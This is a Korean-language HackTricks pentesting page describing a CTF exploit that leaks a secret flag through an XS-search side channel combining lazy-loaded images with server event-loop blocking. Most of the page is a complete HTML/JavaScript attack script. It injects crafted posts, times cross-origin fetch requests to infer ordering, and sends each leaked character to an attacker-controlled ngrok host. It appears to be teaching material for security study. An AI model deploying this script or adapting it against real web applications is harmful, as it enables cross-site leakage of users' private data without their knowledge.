hacktricks/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
2024-02-10 21:30:13 +00:00

7.5 KiB

이벤트 루프 차단 + 지연 이미지

htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

이 exploit에서 @aszx87410은 HTML 삽입을 통한 지연 이미지 사이드 채널 기술과 이벤트 루프 차단 기술을 혼합하여 문자를 유출합니다.

이것은 이미 다음 페이지에서 설명된 CTF chall에 대한 다른 exploit입니다. 자세한 정보는 도전과제에 대한 페이지를 확인하세요:

{% content-ref url="connection-pool-example.md" %} connection-pool-example.md {% endcontent-ref %}

이 exploit의 아이디어는 다음과 같습니다:

  • 게시물은 알파벳순으로 로드됩니다.
  • 공격자는 **"A"**로 시작하는 게시물삽입할 수 있습니다. 그런 다음 **큰 <canvas**와 일부 최종 <img lazy 태그를 로드하는 HTML 태그를 추가합니다.
  • 공격자가 "A" 대신 같은 게시물을 "z"로 시작하도록 삽입하면, 플래그가 있는 게시물먼저 나타나고, 삽입된 게시물이 "z"로 시작되고 캔버스가 나타납니다. 플래그가 있는 게시물이 먼저 나타났기 때문에 첫 번째 캔버스가 화면을 모두 차지하고 최종 <img lazy 태그가 화면에 표시되지 않으므로 로드되지 않습니다.
  • 그런 다음, 봇이 페이지에 액세스하는 동안, 공격자fetch 요청을 보냅니다.
  • 게시물에 삽입된 이미지로드되고 있다면, 이 fetch 요청은 더 오래 걸릴 것이므로 공격자는 게시물이 플래그 앞에 있음을 알 수 있습니다(알파벳순).
  • fetch 요청이 빠르게 이루어진다면, 게시물이 플래그 뒤에 알파벳순으로 있음을 의미합니다.

코드를 확인해보겠습니다:

<!DOCTYPE html>
<html>
<!--
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
-->
<body>
<button onclick="run()">start</button>

<!-- Inject post with payload -->
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
<input id=inp name="text" value="">
</form>

<!-- Remove index -->
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
<input id=inp2 name="index" value="">
</form>

<script>
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'

const sleep = ms => new Promise(r => setTimeout(r, ms))
// Function to leak info to attacker
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')

// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1

// I have omited code here as apparently it wasn't necesary

// fallback to linerar since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}

}, 0)

async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()

setTimeout(() => {
run(str, resolve)
}, 500)
})
}

async function run(str, resolve) {
// Open posts page 5 times
for(let i=1; i<=5;i++) {
window.open(TARGET)
}

let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for(let i=0; i<round; i++) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)

/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}

// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}

</script>
</body>
</html>
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!